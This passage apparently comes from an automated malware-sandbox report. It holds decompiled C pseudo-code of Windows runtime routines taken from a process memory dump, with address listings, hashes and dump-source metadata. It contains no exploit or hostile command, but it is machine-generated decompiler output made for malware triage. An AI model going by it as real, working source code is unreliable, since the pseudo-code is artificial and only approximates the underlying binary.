                                                              										__eflags = _t77 - _t118;
                                                              										if(_t77 != _t118) {
                                                              											L34:
                                                              											_t122 = 0xc0000004;
                                                              											goto L15;
                                                              										}
                                                              										_t111 = _v1056;
                                                              										__eflags = _t111 & 0x00000003;
                                                              										if((_t111 & 0x00000003) == 0) {
                                                              											_v1060 = _t118;
                                                              											__eflags = _t111;
                                                              											if(__eflags == 0) {
                                                              												goto L10;
                                                              											}
                                                              											_t42 = _t102 + 0xc; // 0xc
                                                              											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                                              											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                                              											_push(_t111);
                                                              											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                                              											_push(0);
                                                              											_push( &_v1048);
                                                              											_t122 = E04BD13C0(_t102, _t118, _t122, __eflags);
                                                              											L44:
                                                              											_t118 = _v1072;
                                                              											goto L11;
                                                              										}
                                                              										_t122 = 0x80000002;
                                                              										goto L15;
                                                              									}
                                                              									_t122 = 0xc0000024;
                                                              									goto L44;
                                                              								}
                                                              								__eflags = _t114 - _t109;
                                                              								if(_t114 != _t109) {
                                                              									goto L59;
                                                              								}
                                                              								_t118 = 8;
                                                              								__eflags = _t77 - _t118;
                                                              								if(_t77 != _t118) {
                                                              									goto L34;
                                                              								}
                                                              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                              								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                              									goto L34;
                                                              								}
                                                              								_t112 = _v1056;
                                                              								_v1060 = _t118;
                                                              								__eflags = _t112;
                                                              								if(_t112 == 0) {
                                                              									goto L10;
                                                              								}
                                                              								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                                              								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                                              								goto L11;
                                                              							}
                                                              							__eflags = _t114 - _t118;
                                                              							if(_t114 != _t118) {
                                                              								goto L59;
                                                              							}
                                                              							__eflags = _t77 - _t118;
                                                              							if(_t77 != _t118) {
                                                              								goto L34;
                                                              							}
                                                              							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                              							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                              								goto L34;
                                                              							}
                                                              							_t113 = _v1056;
                                                              							_v1060 = _t118;
                                                              							__eflags = _t113;
                                                              							if(_t113 == 0) {
                                                              								goto L10;
                                                              							}
                                                              							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                                              							goto L11;
                                                              						}
                                                              						_t118 =  *((intOrPtr*)(_t102 + 8));
                                                              						__eflags = _t118 - _a20;
                                                              						if(_t118 <= _a20) {
                                                              							_t114 =  *(_t102 + 4);
                                                              							_t77 = _t118;
                                                              							goto L26;
                                                              						}
                                                              						_v1060 = _t118;
                                                              						goto L10;
                                                              					}
                                                              					__eflags = _t122 - 0x80000005;
                                                              					if(_t122 != 0x80000005) {
                                                              						goto L15;
                                                              					}
                                                              					L04BB77F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                                              					L18:
                                                              					_t121 = _v1060;
                                                              					goto L19;
                                                              				}
                                                              				_push( &_v1060);
                                                              				_push(0x400);
                                                              				_t102 =  &_v1036;
                                                              				_push(_t102);
                                                              				_push(2);
                                                              				_push( &_v1048);
                                                              				_push(_t116);
                                                              				_t122 = E04BD9650();
                                                              				if(_t122 >= 0) {
                                                              					__eflags = 0;
                                                              					_v1052 = 0;
                                                              					goto L7;
                                                              				}
                                                              				if(_t122 == 0x80000005) {
                                                              					goto L18;
                                                              				}
                                                              				goto L4;
                                                              			}










































                                                              0x04b9c608
                                                              0x04b9c615
                                                              0x04b9c625
                                                              0x04b9c62d
                                                              0x04b9c635
                                                              0x04b9c640
                                                              0x04b9c680
                                                              0x04b9c687
                                                              0x04b9c688
                                                              0x04b9c689
                                                              0x04b9c694
                                                              0x04b9c694
                                                              0x04b9c642
                                                              0x04b9c64a
                                                              0x04b9c697
                                                              0x04c07a25
                                                              0x04c07a2b
                                                              0x04c07a2e
                                                              0x04c07a30
                                                              0x04c07bea
                                                              0x04c07bea
                                                              0x00000000
                                                              0x04c07bea
                                                              0x04c07a36
                                                              0x04c07a43
                                                              0x04c07a48
                                                              0x04c07a4c
                                                              0x04c07a4e
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07a58
                                                              0x04c07a5a
                                                              0x04c07a5b
                                                              0x04c07a5c
                                                              0x04c07a5d
                                                              0x04c07a63
                                                              0x04c07a64
                                                              0x04c07a6a
                                                              0x04c07a6c
                                                              0x04c07a6e
                                                              0x04c079cb
                                                              0x04c079cb
                                                              0x04c079ce
                                                              0x04c079d0
                                                              0x04c07a98
                                                              0x04c07a9b
                                                              0x04c07a9b
                                                              0x04c07a9e
                                                              0x04c07aa1
                                                              0x04c07bbe
                                                              0x04c07bbe
                                                              0x04c07bc0
                                                              0x04c07be0
                                                              0x04c07be0
                                                              0x04c07a01
                                                              0x04c07a01
                                                              0x04c07a05
                                                              0x04c07a07
                                                              0x04c07a15
                                                              0x04c07a15
                                                              0x04c07a1a
                                                              0x00000000
                                                              0x04c07a1a
                                                              0x04c07bc2
                                                              0x04c07bc6
                                                              0x04c07bc9
                                                              0x04c07bcd
                                                              0x04c07bcf
                                                              0x04c079e6
                                                              0x04c079e6
                                                              0x04c079eb
                                                              0x04c079eb
                                                              0x04c079ef
                                                              0x04c079f1
                                                              0x00000000
                                                              0x00000000
                                                              0x04c079f3
                                                              0x04c079f5
                                                              0x04c079ff
                                                              0x04c079ff
                                                              0x00000000
                                                              0x04c079ff
                                                              0x04c079f7
                                                              0x04c079fd
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c079fd
                                                              0x04c07bd5
                                                              0x04c07bd8
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07ba9
                                                              0x04c07bac
                                                              0x04c07bb0
                                                              0x04c07bb1
                                                              0x04c07bb1
                                                              0x04c07bb6
                                                              0x00000000
                                                              0x04c07bb6
                                                              0x04c07aa7
                                                              0x04c07aaa
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07ab2
                                                              0x04c07ab3
                                                              0x04c07ab5
                                                              0x04c07aec
                                                              0x04c07aef
                                                              0x04c07b25
                                                              0x04c07b28
                                                              0x04c07b62
                                                              0x04c07b64
                                                              0x04c07b8f
                                                              0x04c07b92
                                                              0x04c07b96
                                                              0x04c07b98
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07b9e
                                                              0x04c07b9f
                                                              0x04c07ba3
                                                              0x00000000
                                                              0x04c07ba3
                                                              0x04c07b66
                                                              0x04c07b68
                                                              0x04c07ae2
                                                              0x04c07ae2
                                                              0x00000000
                                                              0x04c07ae2
                                                              0x04c07b6e
                                                              0x04c07b72
                                                              0x04c07b75
                                                              0x04c07b81
                                                              0x04c07b85
                                                              0x04c07b87
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07b31
                                                              0x04c07b34
                                                              0x04c07b3c
                                                              0x04c07b45
                                                              0x04c07b46
                                                              0x04c07b4f
                                                              0x04c07b51
                                                              0x04c07b57
                                                              0x04c07b59
                                                              0x04c07b59
                                                              0x00000000
                                                              0x04c07b59
                                                              0x04c07b77
                                                              0x00000000
                                                              0x04c07b77
                                                              0x04c07b2a
                                                              0x00000000
                                                              0x04c07b2a
                                                              0x04c07af1
                                                              0x04c07af3
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07afb
                                                              0x04c07afc
                                                              0x04c07afe
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07b00
                                                              0x04c07b03
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07b05
                                                              0x04c07b09
                                                              0x04c07b0d
                                                              0x04c07b0f
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07b18
                                                              0x04c07b1d
                                                              0x00000000
                                                              0x04c07b1d
                                                              0x04c07ab7
                                                              0x04c07ab9
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07abf
                                                              0x04c07ac1
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07ac3
                                                              0x04c07ac6
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07ac8
                                                              0x04c07acc
                                                              0x04c07ad0
                                                              0x04c07ad2
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07adb
                                                              0x00000000
                                                              0x04c07adb
                                                              0x04c079d6
                                                              0x04c079d9
                                                              0x04c079dc
                                                              0x04c07a91
                                                              0x04c07a94
                                                              0x00000000
                                                              0x04c07a94
                                                              0x04c079e2
                                                              0x00000000
                                                              0x04c079e2
                                                              0x04c07a74
                                                              0x04c07a7a
                                                              0x00000000
                                                              0x00000000
                                                              0x04c07a8a
                                                              0x04c07a21
                                                              0x04c07a21
                                                              0x00000000
                                                              0x04c07a21
                                                              0x04b9c650
                                                              0x04b9c651
                                                              0x04b9c656
                                                              0x04b9c65c
                                                              0x04b9c65d
                                                              0x04b9c663
                                                              0x04b9c664
                                                              0x04b9c66a
                                                              0x04b9c66e
                                                              0x04c079c5
                                                              0x04c079c7
                                                              0x00000000
                                                              0x04c079c7
                                                              0x04b9c67a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 379dbe91206d2882be7398034d7fa1fd3da8f3a9b282fa20ef2db9ecb2d3ed17
                                                              • Instruction ID: 470b0eae74dbbec8888bb1b58dbc7a8b7264e3f7752056b24301c9d760c41029
                                                              • Opcode Fuzzy Hash: 379dbe91206d2882be7398034d7fa1fd3da8f3a9b282fa20ef2db9ecb2d3ed17
                                                              • Instruction Fuzzy Hash: 408183756062059FDB29CF14C880B7A77E6FB84354F19C86AED459B280E330FE41CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 39%
                                                              			E04C2B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                              				char _v8;
                                                              				signed int _v12;
                                                              				signed int _t80;
                                                              				signed int _t83;
                                                              				intOrPtr _t89;
                                                              				signed int _t92;
                                                              				signed char _t106;
                                                              				signed int* _t107;
                                                              				intOrPtr _t108;
                                                              				intOrPtr _t109;
                                                              				signed int _t114;
                                                              				void* _t115;
                                                              				void* _t117;
                                                              				void* _t119;
                                                              				void* _t122;
                                                              				signed int _t123;
                                                              				signed int* _t124;
                                                              
                                                              				_t106 = _a12;
                                                              				if((_t106 & 0xfffffffc) != 0) {
                                                              					return 0xc000000d;
                                                              				}
                                                              				if((_t106 & 0x00000002) != 0) {
                                                              					_t106 = _t106 | 0x00000001;
                                                              				}
                                                              				_t109 =  *0x4c87b9c; // 0x0
                                                              				_t124 = L04BB4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                              				if(_t124 != 0) {
                                                              					 *_t124 =  *_t124 & 0x00000000;
                                                              					_t124[1] = _t124[1] & 0x00000000;
                                                              					_t124[4] = _t124[4] & 0x00000000;
                                                              					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                              						L13:
                                                              						_push(_t124);
                                                              						if((_t106 & 0x00000002) != 0) {
                                                              							_push(0x200);
                                                              							_push(0x28);
                                                              							_push(0xffffffff);
                                                              							_t122 = E04BD9800();
                                                              							if(_t122 < 0) {
                                                              								L33:
                                                              								if((_t124[4] & 0x00000001) != 0) {
                                                              									_push(4);
                                                              									_t64 =  &(_t124[1]); // 0x4
                                                              									_t107 = _t64;
                                                              									_push(_t107);
                                                              									_push(5);
                                                              									_push(0xfffffffe);
                                                              									E04BD95B0();
                                                              									if( *_t107 != 0) {
                                                              										_push( *_t107);
                                                              										E04BD95D0();
                                                              									}
                                                              								}
                                                              								_push(_t124);
                                                              								_push(0);
                                                              								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                              								L37:
                                                              								L04BB77F0();
                                                              								return _t122;
                                                              							}
                                                              							_t124[4] = _t124[4] | 0x00000002;
                                                              							L18:
                                                              							_t108 = _a8;
                                                              							_t29 =  &(_t124[0x105]); // 0x414
                                                              							_t80 = _t29;
                                                              							_t30 =  &(_t124[5]); // 0x14
                                                              							_t124[3] = _t80;
                                                              							_t123 = 0;
                                                              							_t124[2] = _t30;
                                                              							 *_t80 = _t108;
                                                              							if(_t108 == 0) {
                                                              								L21:
                                                              								_t112 = 0x400;
                                                              								_push( &_v8);
                                                              								_v8 = 0x400;
                                                              								_push(_t124[2]);
                                                              								_push(0x400);
                                                              								_push(_t124[3]);
                                                              								_push(0);
                                                              								_push( *_t124);
                                                              								_t122 = E04BD9910();
                                                              								if(_t122 != 0xc0000023) {
                                                              									L26:
                                                              									if(_t122 != 0x106) {
                                                              										L40:
                                                              										if(_t122 < 0) {
                                                              											L29:
                                                              											_t83 = _t124[2];
                                                              											if(_t83 != 0) {
                                                              												_t59 =  &(_t124[5]); // 0x14
                                                              												if(_t83 != _t59) {
                                                              													L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                              												}
                                                              											}
                                                              											_push( *_t124);
                                                              											E04BD95D0();
                                                              											goto L33;
                                                              										}
                                                              										 *_a16 = _t124;
                                                              										return 0;
                                                              									}
                                                              									if(_t108 != 1) {
                                                              										_t122 = 0;
                                                              										goto L40;
                                                              									}
                                                              									_t122 = 0xc0000061;
                                                              									goto L29;
                                                              								} else {
                                                              									goto L22;
                                                              								}
                                                              								while(1) {
                                                              									L22:
                                                              									_t89 =  *0x4c87b9c; // 0x0
                                                              									_t92 = L04BB4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                              									_t124[2] = _t92;
                                                              									if(_t92 == 0) {
                                                              										break;
                                                              									}
                                                              									_t112 =  &_v8;
                                                              									_push( &_v8);
                                                              									_push(_t92);
                                                              									_push(_v8);
                                                              									_push(_t124[3]);
                                                              									_push(0);
                                                              									_push( *_t124);
                                                              									_t122 = E04BD9910();
                                                              									if(_t122 != 0xc0000023) {
                                                              										goto L26;
                                                              									}
                                                              									L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                              								}
                                                              								_t122 = 0xc0000017;
                                                              								goto L26;
                                                              							}
                                                              							_t119 = 0;
                                                              							do {
                                                              								_t114 = _t124[3];
                                                              								_t119 = _t119 + 0xc;
                                                              								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                              								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                              								_t123 = _t123 + 1;
                                                              								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                              							} while (_t123 < _t108);
                                                              							goto L21;
                                                              						}
                                                              						_push(0x28);
                                                              						_push(3);
                                                              						_t122 = E04B9A7B0();
                                                              						if(_t122 < 0) {
                                                              							goto L33;
                                                              						}
                                                              						_t124[4] = _t124[4] | 0x00000001;
                                                              						goto L18;
                                                              					}
                                                              					if((_t106 & 0x00000001) == 0) {
                                                              						_t115 = 0x28;
                                                              						_t122 = E04C2E7D3(_t115, _t124);
                                                              						if(_t122 < 0) {
                                                              							L9:
                                                              							_push(_t124);
                                                              							_push(0);
                                                              							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                              							goto L37;
                                                              						}
                                                              						L12:
                                                              						if( *_t124 != 0) {
                                                              							goto L18;
                                                              						}
                                                              						goto L13;
                                                              					}
                                                              					_t15 =  &(_t124[1]); // 0x4
                                                              					_t117 = 4;
                                                              					_t122 = E04C2E7D3(_t117, _t15);
                                                              					if(_t122 >= 0) {
                                                              						_t124[4] = _t124[4] | 0x00000001;
                                                              						_v12 = _v12 & 0x00000000;
                                                              						_push(4);
                                                              						_push( &_v12);
                                                              						_push(5);
                                                              						_push(0xfffffffe);
                                                              						E04BD95B0();
                                                              						goto L12;
                                                              					}
                                                              					goto L9;
                                                              				} else {
                                                              					return 0xc0000017;
                                                              				}
                                                              			}




















                                                              0x04c2b8d9
                                                              0x04c2b8e4
                                                              0x00000000
                                                              0x04c2b8e6
                                                              0x04c2b8f3
                                                              0x04c2b8f5
                                                              0x04c2b8f5
                                                              0x04c2b8f8
                                                              0x04c2b920
                                                              0x04c2b924
                                                              0x04c2b936
                                                              0x04c2b939
                                                              0x04c2b93d
                                                              0x04c2b948
                                                              0x04c2b9a0
                                                              0x04c2b9a0
                                                              0x04c2b9a4
                                                              0x04c2b9bf
                                                              0x04c2b9c4
                                                              0x04c2b9c6
                                                              0x04c2b9cd
                                                              0x04c2b9d1
                                                              0x04c2bad4
                                                              0x04c2bad8
                                                              0x04c2bada
                                                              0x04c2badc
                                                              0x04c2badc
                                                              0x04c2badf
                                                              0x04c2bae0
                                                              0x04c2bae2
                                                              0x04c2bae4
                                                              0x04c2baec
                                                              0x04c2baee
                                                              0x04c2baf0
                                                              0x04c2baf0
                                                              0x04c2baec
                                                              0x04c2bafb
                                                              0x04c2bafc
                                                              0x04c2bafe
                                                              0x04c2bb01
                                                              0x04c2bb01
                                                              0x00000000
                                                              0x04c2bb06
                                                              0x04c2b9d7
                                                              0x04c2b9db
                                                              0x04c2b9db
                                                              0x04c2b9de
                                                              0x04c2b9de
                                                              0x04c2b9e4
                                                              0x04c2b9e7
                                                              0x04c2b9ea
                                                              0x04c2b9ec
                                                              0x04c2b9ef
                                                              0x04c2b9f3
                                                              0x04c2ba1b
                                                              0x04c2ba1b
                                                              0x04c2ba23
                                                              0x04c2ba24
                                                              0x04c2ba27
                                                              0x04c2ba2a
                                                              0x04c2ba2b
                                                              0x04c2ba2e
                                                              0x04c2ba30
                                                              0x04c2ba37
                                                              0x04c2ba3f
                                                              0x04c2ba9c
                                                              0x04c2baa2
                                                              0x04c2bb13
                                                              0x04c2bb15
                                                              0x04c2baae
                                                              0x04c2baae
                                                              0x04c2bab3
                                                              0x04c2bab5
                                                              0x04c2baba
                                                              0x04c2bac8
                                                              0x04c2bac8
                                                              0x04c2baba
                                                              0x04c2bacd
                                                              0x04c2bacf
                                                              0x00000000
                                                              0x04c2bacf
                                                              0x04c2bb1a
                                                              0x00000000
                                                              0x04c2bb1c
                                                              0x04c2baa7
                                                              0x04c2bb11
                                                              0x00000000
                                                              0x04c2bb11
                                                              0x04c2baa9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c2ba41
                                                              0x04c2ba41
                                                              0x04c2ba41
                                                              0x04c2ba58
                                                              0x04c2ba5d
                                                              0x04c2ba62
                                                              0x00000000
                                                              0x00000000
                                                              0x04c2ba64
                                                              0x04c2ba67
                                                              0x04c2ba68
                                                              0x04c2ba69
                                                              0x04c2ba6c
                                                              0x04c2ba6f
                                                              0x04c2ba71
                                                              0x04c2ba78
                                                              0x04c2ba80
                                                              0x00000000
                                                              0x00000000
                                                              0x04c2ba90
                                                              0x04c2ba90
                                                              0x04c2ba97
                                                              0x00000000
                                                              0x04c2ba97
                                                              0x04c2b9f5
                                                              0x04c2b9f7
                                                              0x04c2b9f7
                                                              0x04c2b9fa
                                                              0x04c2ba03
                                                              0x04c2ba07
                                                              0x04c2ba0c
                                                              0x04c2ba10
                                                              0x04c2ba17
                                                              0x00000000
                                                              0x04c2b9f7
                                                              0x04c2b9a6
                                                              0x04c2b9a8
                                                              0x04c2b9af
                                                              0x04c2b9b3
                                                              0x00000000
                                                              0x00000000
                                                              0x04c2b9b9
                                                              0x00000000
                                                              0x04c2b9b9
                                                              0x04c2b94d
                                                              0x04c2b98f
                                                              0x04c2b995
                                                              0x04c2b999
                                                              0x04c2b960
                                                              0x04c2b967
                                                              0x04c2b968
                                                              0x04c2b96a
                                                              0x00000000
                                                              0x04c2b96a
                                                              0x04c2b99b
                                                              0x04c2b99e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c2b99e
                                                              0x04c2b951
                                                              0x04c2b954
                                                              0x04c2b95a
                                                              0x04c2b95e
                                                              0x04c2b972
                                                              0x04c2b979
                                                              0x04c2b97d
                                                              0x04c2b97f
                                                              0x04c2b980
                                                              0x04c2b982
                                                              0x04c2b984
                                                              0x00000000
                                                              0x04c2b984
                                                              0x00000000
                                                              0x04c2b926
                                                              0x00000000
                                                              0x04c2b926

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3af6c3e560fa077f3e957ae12faa79119a82f7036156cf57280bcd55734348d9
                                                              • Instruction ID: 2bd40eb433986bece8ca1a8f8b0a24993853ae5d8d4b0d45355141a99190378f
                                                              • Opcode Fuzzy Hash: 3af6c3e560fa077f3e957ae12faa79119a82f7036156cf57280bcd55734348d9
                                                              • Instruction Fuzzy Hash: 8671EC32200B21EFE7219E15CA44B66B7B6EB40724F144968E6558B2A1FBB5FE40CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 78%
                                                              			E04B952A5(char __ecx) {
                                                              				char _v20;
                                                              				char _v28;
                                                              				char _v29;
                                                              				void* _v32;
                                                              				void* _v36;
                                                              				void* _v37;
                                                              				void* _v38;
                                                              				void* _v40;
                                                              				void* _v46;
                                                              				void* _v64;
                                                              				void* __ebx;
                                                              				intOrPtr* _t49;
                                                              				signed int _t53;
                                                              				short _t85;
                                                              				signed int _t87;
                                                              				signed int _t88;
                                                              				signed int _t89;
                                                              				intOrPtr _t101;
                                                              				intOrPtr* _t102;
                                                              				intOrPtr* _t104;
                                                              				signed int _t106;
                                                              				void* _t108;
                                                              
                                                              				_t93 = __ecx;
                                                              				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                              				_push(_t88);
                                                              				_v29 = __ecx;
                                                              				_t89 = _t88 | 0xffffffff;
                                                              				while(1) {
                                                              					E04BAEEF0(0x4c879a0);
                                                              					_t104 =  *0x4c88210; // 0x2e61cc0
                                                              					if(_t104 == 0) {
                                                              						break;
                                                              					}
                                                              					asm("lock inc dword [esi]");
                                                              					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                              					E04BAEB70(_t93, 0x4c879a0);
                                                              					if( *((char*)(_t108 + 0xf)) != 0) {
                                                              						_t101 =  *0x7ffe02dc;
                                                              						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                              						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                              							L9:
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push(0x90028);
                                                              							_push(_t108 + 0x20);
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push(0);
                                                              							_push( *((intOrPtr*)(_t104 + 4)));
                                                              							_t53 = E04BD9890();
                                                              							__eflags = _t53;
                                                              							if(_t53 >= 0) {
                                                              								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                              								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                              									E04BAEEF0(0x4c879a0);
                                                              									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                              									E04BAEB70(0, 0x4c879a0);
                                                              								}
                                                              								goto L3;
                                                              							}
                                                              							__eflags = _t53 - 0xc0000012;
                                                              							if(__eflags == 0) {
                                                              								L12:
                                                              								_t13 = _t104 + 0xc; // 0x2e61ccd
                                                              								_t93 = _t13;
                                                              								 *((char*)(_t108 + 0x12)) = 0;
                                                              								__eflags = E04BCF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                              								if(__eflags >= 0) {
                                                              									L15:
                                                              									_t102 = _v28;
                                                              									 *_t102 = 2;
                                                              									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                              									E04BAEEF0(0x4c879a0);
                                                              									__eflags =  *0x4c88210 - _t104; // 0x2e61cc0
                                                              									if(__eflags == 0) {
                                                              										__eflags =  *((char*)(_t108 + 0xe));
                                                              										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                              										 *0x4c88210 = _t102;
                                                              										_t32 = _t102 + 0xc; // 0x0
                                                              										 *_t95 =  *_t32;
                                                              										_t33 = _t102 + 0x10; // 0x0
                                                              										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                              										_t35 = _t102 + 4; // 0xffffffff
                                                              										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                              										if(__eflags != 0) {
                                                              											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                              											E04C14888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                              										}
                                                              										E04BAEB70(_t95, 0x4c879a0);
                                                              										asm("lock xadd [esi], eax");
                                                              										if(__eflags == 0) {
                                                              											_push( *((intOrPtr*)(_t104 + 4)));
                                                              											E04BD95D0();
                                                              											L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                              										}
                                                              										asm("lock xadd [esi], ebx");
                                                              										__eflags = _t89 == 1;
                                                              										if(_t89 == 1) {
                                                              											_push( *((intOrPtr*)(_t104 + 4)));
                                                              											E04BD95D0();
                                                              											L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                              										}
                                                              										_t49 = _t102;
                                                              										L4:
                                                              										return _t49;
                                                              									}
                                                              									E04BAEB70(_t93, 0x4c879a0);
                                                              									asm("lock xadd [esi], eax");
                                                              									if(__eflags == 0) {
                                                              										_push( *((intOrPtr*)(_t104 + 4)));
                                                              										E04BD95D0();
                                                              										L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                              										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                              									}
                                                              									 *_t102 = 1;
                                                              									asm("lock xadd [edi], eax");
                                                              									if(__eflags == 0) {
                                                              										_t28 = _t102 + 4; // 0xffffffff
                                                              										_push( *_t28);
                                                              										E04BD95D0();
                                                              										L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                              									}
                                                              									continue;
                                                              								}
                                                              								_t93 =  &_v20;
                                                              								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                              								_t85 = 6;
                                                              								_v20 = _t85;
                                                              								_t87 = E04BCF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                              								__eflags = _t87;
                                                              								if(_t87 < 0) {
                                                              									goto L3;
                                                              								}
                                                              								 *((char*)(_t108 + 0xe)) = 1;
                                                              								goto L15;
                                                              							}
                                                              							__eflags = _t53 - 0xc000026e;
                                                              							if(__eflags != 0) {
                                                              								goto L3;
                                                              							}
                                                              							goto L12;
                                                              						}
                                                              						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                              						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                              							goto L3;
                                                              						} else {
                                                              							goto L9;
                                                              						}
                                                              					}
                                                              					L3:
                                                              					_t49 = _t104;
                                                              					goto L4;
                                                              				}
                                                              				_t49 = 0;
                                                              				goto L4;
                                                              			}

























                                                              0x04b952a5
                                                              0x04b952ad
                                                              0x04b952b0
                                                              0x04b952b3
                                                              0x04b952b7
                                                              0x04b952ba
                                                              0x04b952bf
                                                              0x04b952c4
                                                              0x04b952cc
                                                              0x00000000
                                                              0x00000000
                                                              0x04b952ce
                                                              0x04b952d9
                                                              0x04b952dd
                                                              0x04b952e7
                                                              0x04b952f7
                                                              0x04b952f9
                                                              0x04b952fd
                                                              0x04bf0dcf
                                                              0x04bf0dd5
                                                              0x04bf0dd6
                                                              0x04bf0dd7
                                                              0x04bf0dd8
                                                              0x04bf0dd9
                                                              0x04bf0dde
                                                              0x04bf0ddf
                                                              0x04bf0de0
                                                              0x04bf0de1
                                                              0x04bf0de2
                                                              0x04bf0de5
                                                              0x04bf0dea
                                                              0x04bf0dec
                                                              0x04bf0f60
                                                              0x04bf0f64
                                                              0x04bf0f70
                                                              0x04bf0f76
                                                              0x04bf0f79
                                                              0x04bf0f79
                                                              0x00000000
                                                              0x04bf0f64
                                                              0x04bf0df2
                                                              0x04bf0df7
                                                              0x04bf0e04
                                                              0x04bf0e0d
                                                              0x04bf0e0d
                                                              0x04bf0e10
                                                              0x04bf0e1a
                                                              0x04bf0e1c
                                                              0x04bf0e4c
                                                              0x04bf0e52
                                                              0x04bf0e61
                                                              0x04bf0e67
                                                              0x04bf0e6b
                                                              0x04bf0e70
                                                              0x04bf0e76
                                                              0x04bf0ed7
                                                              0x04bf0edc
                                                              0x04bf0ee0
                                                              0x04bf0ee6
                                                              0x04bf0eea
                                                              0x04bf0eed
                                                              0x04bf0ef0
                                                              0x04bf0ef3
                                                              0x04bf0ef6
                                                              0x04bf0ef9
                                                              0x04bf0efe
                                                              0x04bf0f01
                                                              0x04bf0f01
